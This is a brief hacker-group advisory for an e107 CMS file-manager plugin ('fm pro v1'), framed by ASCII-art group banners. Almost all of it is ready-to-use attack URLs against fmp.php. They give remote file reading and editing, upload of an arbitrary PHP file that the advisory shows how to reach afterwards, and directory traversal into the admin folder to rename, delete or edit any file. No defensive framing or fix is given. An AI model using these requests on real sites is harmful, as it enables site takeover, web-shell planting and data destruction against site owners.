_____ ____ __ __ _ ____ ____ ____ |_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| | | | |_) | \ V / / _ \ | | _ | | | | | | | _ < | | / ___ \ | |_| | _ | |___ | |___ |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| e107 Plugin fm pro v1 Multiple Remote Vulnerabilities I- Remote File Disclosure / Write File /e107_plugins/fm_pro_v1/fmp.php?fm_dir=&fm_action=confirm_edit_file&fm_filename={File} II- Remote File Upload /e107_plugins/fm_pro_v1/fmp.php?fm_dir=&fm_action=confirm_upload_file You Can Upload PHP File Get File in site.com/{path e107}/[name your file - as - 020.php] III- Local Directory Traversal /e107_plugins/fm_pro_v1/fmp.php?fm_dir=e107_admin And You Can [Rename] [Delete] [View] [Edit] Any Folder Or File ____ _ _ __ __ / ___| ___ | | __| | | \/ | | | _ / _ \ | | / _` | | |\/| | | |_| | | (_) | | |___ | (_| | | | | | \____| \___/ |_____| \__,_| _____ |_| |_| |_____|